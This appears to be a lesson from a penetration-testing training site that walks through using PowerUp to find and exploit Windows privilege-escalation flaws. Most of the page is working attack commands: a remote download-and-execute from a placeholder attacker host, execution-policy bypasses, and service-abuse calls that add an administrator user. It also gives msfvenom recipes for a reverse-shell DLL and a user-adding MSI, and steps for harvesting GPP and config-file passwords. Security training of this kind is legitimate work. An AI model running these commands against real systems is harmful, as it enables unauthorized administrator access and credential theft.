PowerUp for Privilege Escalation

intermediate30 minWriteup

Using PowerUp to find and exploit vulnerabilities

Learning Objectives

  • Run PowerUp checks
  • Understand vulnerability types
  • Exploit with PowerUp
  • Manual verification

PowerUp is a PowerShell-based privilege escalation tool from the PowerSploit framework. Unlike

which only enumerates, PowerUp can both find AND exploit vulnerabilities automatically. It's like having a pentest robot.

PowerUp focuses on the most common and reliable Windows privilege escalation vectors: service misconfigurations, DLL hijacking, AlwaysInstallElevated, and more. It's your go-to tool when you need quick results.

PowerShell Required

PowerUp requires PowerShell. If PowerShell is restricted, you may need to bypass execution policies or use other tools instead.

Getting PowerUp

powershell
1606070;"># PowerUp is part of PowerSploit
2606070;"># https://github.com/PowerShellMafia/PowerSploit
3 
4606070;"># Download and import
5IEX(New-Object Net.WebClient).DownloadString(606070;">#a5d6ff;">'http://ATTACKER/PowerUp.ps1')
6 
7606070;"># Or if you have the file locally
8Import-Module .PowerUp.ps1
9. .PowerUp.ps1
10 
11606070;"># Bypass execution policy if needed
12powershell -ep bypass
13Set-ExecutionPolicy Bypass -Scope Process
14 
15606070;"># If AMSI is blocking, need AMSI bypass first
16606070;"># (Various techniques, out of scope here)

Invoke-AllChecks

The main command that runs all enumeration checks at once. This is your first stop when using PowerUp.

powershell
1606070;"># Run all checks
2Invoke-AllChecks
3 
4606070;"># Example output:
5606070;"># [*] Running Invoke-AllChecks
6606070;">#
7606070;"># [*] Checking for modifiable service binaries...
8606070;">#
9606070;"># ServiceName   : vulnerable_service
10606070;"># Path          : C:Program FilesVulnerableservice.exe
11606070;"># ModifiablePath: C:Program FilesVulnerableservice.exe
12606070;"># StartName     : LocalSystem
13606070;"># AbuseFunction : Install-ServiceBinary -Name 'vulnerable_service'
14606070;">#
15606070;"># [*] Checking for unquoted service paths...
16606070;">#
17606070;"># ServiceName    : another_service
18606070;"># Path           : C:Program FilesMy Appservice.exe
19606070;"># StartName      : LocalSystem
20606070;"># AbuseFunction  : Write-ServiceBinary -Name 'another_service' -Path ...
21606070;">#
22606070;"># [*] Checking for AlwaysInstallElevated...
23606070;">#
24606070;"># AbuseFunction : Write-UserAddMSI
25 
26606070;"># Output to file
27Invoke-AllChecks | Out-File -Encoding ASCII checks.txt

AbuseFunction

PowerUp tells you exactly how to exploit each finding with an "AbuseFunction". Run that function to automatically exploit the vulnerability!

Service-Related Checks

powershell
1606070;"># === Service Binary Permissions ===
2606070;"># Find services where we can modify the binary
3Get-ModifiableServiceFile
4 
5606070;"># Exploit: Replace service binary
6Install-ServiceBinary -Name 606070;">#a5d6ff;">'vulnerable_service'
7606070;"># Creates service.exe.bak, replaces with user-adding binary
8606070;"># Restart service to trigger
9 
10606070;"># === Service Configuration ===
11606070;"># Find services we can reconfigure
12Get-ModifiableService
13 
14606070;"># Exploit: Change binary path to our payload
15Invoke-ServiceAbuse -Name 606070;">#a5d6ff;">'vulnerable_service'
16606070;"># Adds current user to local Administrators
17606070;"># Or custom command:
18Invoke-ServiceAbuse -Name 606070;">#a5d6ff;">'vulnerable_service' -Command "net localgroup Administrators attacker /add"
19 
20606070;"># === Unquoted Service Paths ===
21Get-UnquotedService
22 
23606070;"># Exploit: Write malicious binary to unquoted path
24Write-ServiceBinary -Name 606070;">#a5d6ff;">'service_name' -Path 'C:Program.exe'
25606070;"># Or manual placement, then restart service
26 
27606070;"># === Service Permissions Check ===
28606070;"># Uses accesschk internally
29Get-ServiceUnquoted
30Get-ModifiableServiceFile

Service Exploitation Flow

powershell
1606070;"># Example: Found modifiable service binary
2 
3606070;"># 1. PowerUp reports:
4606070;"># ServiceName   : VulnService
5606070;"># Path          : C:Servicesuln.exe
6606070;"># AbuseFunction : Install-ServiceBinary -Name 'VulnService'
7 
8606070;"># 2. Run the abuse function
9Install-ServiceBinary -Name 606070;">#a5d6ff;">'VulnService'
10606070;"># Backs up original, replaces with payload that adds user
11 
12606070;"># 3. Restart service (need restart permission)
13Restart-Service VulnService
14606070;"># Or wait for system restart
15 
16606070;"># 4. After service runs, new admin user exists
17net localgroup Administrators
18606070;"># Should show 'john' added by PowerUp
19 
20606070;"># 5. Log in as new admin or use credentials
21 
22606070;"># Custom payload option:
23Install-ServiceBinary -Name 606070;">#a5d6ff;">'VulnService' -Command 'C:	empshell.exe'
24Restart-Service VulnService

DLL Hijacking Checks

powershell
1606070;"># Find DLL hijacking opportunities
2Find-ProcessDLLHijack
3Find-PathDLLHijack
4 
5606070;"># Check for missing DLLs in PATH locations
6606070;"># PowerUp checks for:
7606070;"># - Missing DLLs that services try to load
8606070;"># - Writable directories in PATH before system dirs
9606070;"># - Known DLL hijacking opportunities
10 
11606070;"># Exploitation requires:
12606070;"># 1. Writing malicious DLL to found location
13606070;"># 2. Restarting the vulnerable service/process
14 
15606070;"># Create malicious DLL (on attack machine)
16606070;"># msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=4444 -f dll > evil.dll
17606070;"># Transfer to target in hijackable location
18 
19606070;"># Example PATH hijack
20606070;"># If C:Temp is in PATH before C:WindowsSystem32
21606070;"># And a program looks for "missing.dll"
22Copy-Item evil.dll C:Tempmissing.dll
23606070;"># Wait for or trigger the program

Registry Checks

powershell
1606070;"># === AlwaysInstallElevated ===
2Get-RegistryAlwaysInstallElevated
3 
4606070;"># If enabled (both HKLM and HKCU):
5Write-UserAddMSI
6606070;"># Creates UserAdd.msi that adds admin user when installed
7 
8606070;"># Manual: Create MSI with msfvenom
9606070;"># msfvenom -p windows/adduser USER=pwned PASS=Password123! -f msi > evil.msi
10606070;"># Or reverse shell MSI
11 
12606070;"># Install (as normal user, runs as SYSTEM!)
13msiexec /quiet /qn /i evil.msi
14 
15606070;"># === AutoRun Programs ===
16Get-ModifiableRegistryAutoRun
17 
18606070;"># Find AutoRun programs with weak permissions
19606070;"># Replace with malicious binary, runs on next login
20 
21606070;"># === Scheduled Tasks ===
22Get-ModifiableScheduledTaskFile
23 
24606070;"># Find scheduled tasks pointing to modifiable files

Credential Checks

powershell
1606070;"># === Unattend Files ===
2Get-UnattendedInstallFile
3 
4606070;"># Searches for:
5606070;"># - Unattend.xml
6606070;"># - sysprep.xml
7606070;"># - sysprep.inf
8606070;"># Returns paths and sometimes passwords!
9 
10606070;"># === Group Policy Preferences ===
11Get-GPPPassword
12 
13606070;"># Finds cpassword in:
14606070;"># - Groups.xml
15606070;"># - ScheduledTasks.xml
16606070;"># - Services.xml
17606070;"># Decrypts automatically!
18 
19606070;"># === Web Config Files ===
20Get-WebConfig
21 
22606070;"># Searches IIS config for connection strings
23606070;"># May contain database passwords
24 
25606070;"># === Application Config ===
26Get-ApplicationHost
27 
28606070;"># IIS application pool passwords

GPP Passwords

Group Policy Preference passwords are encrypted with a known key (published by Microsoft!). PowerUp decrypts them automatically. These often contain domain admin credentials.

PowerUp Function Reference

1PowerUp Functions:
2├── Enumeration
3│   ├── Invoke-AllChecks        - Run all checks
4│   ├── Get-ModifiableService   - Modifiable service configs
5│   ├── Get-ModifiableServiceFile - Modifiable service binaries
6│   ├── Get-UnquotedService     - Unquoted service paths
7│   ├── Get-ServiceDetail       - Service details
8│   ├── Find-ProcessDLLHijack   - Process DLL hijacking
9│   ├── Find-PathDLLHijack      - PATH DLL hijacking
10│   ├── Get-RegistryAlwaysInstallElevated
11│   ├── Get-RegistryAutoLogon
12│   ├── Get-ModifiableRegistryAutoRun
13│   ├── Get-ModifiableScheduledTaskFile
14│   ├── Get-UnattendedInstallFile
15│   ├── Get-GPPPassword
16│   ├── Get-WebConfig
17│   └── Get-ApplicationHost
18
19├── Exploitation
20│   ├── Install-ServiceBinary   - Replace service binary
21│   ├── Invoke-ServiceAbuse     - Abuse service permissions
22│   ├── Write-ServiceBinary     - Write to unquoted path
23│   ├── Write-HijackDll         - Write DLL for hijacking
24│   └── Write-UserAddMSI        - Create admin-adding MSI
25
26└── Helpers
27    ├── Get-ServicePermission
28    ├── Test-ServiceDaclPermission
29    └── Restore-ServiceBinary   - Restore original binary

PowerUp Methodology

PowerUp Workflow

1
ImportImport-Module .\PowerUp.ps1 or IEX download
2
All ChecksInvoke-AllChecks to enumerate
3
ReviewCheck output for AbuseFunction hints
4
ChooseSelect easiest/most reliable exploit
5
ExploitRun the AbuseFunction or manual exploit
6
VerifyConfirm privilege escalation succeeded

Knowledge Check

Quick Quiz
Question 1 of 3

What does PowerUp's Invoke-AllChecks do?

Challenges

PowerUp Exploitation

Challenge
🔥 intermediate

Use PowerUp to find a privilege escalation vulnerability and exploit it using the suggested AbuseFunction.

Need a hint? (4 available)

Key Takeaways

  • PowerUp both finds and exploits privilege escalation vectors
  • Invoke-AllChecks runs all enumeration at once
  • AbuseFunction tells you exactly how to exploit each finding
  • Focus on: services, AlwaysInstallElevated, credentials
  • Can automatically add admin user or run custom commands
  • Combine with WinPEAS for comprehensive coverage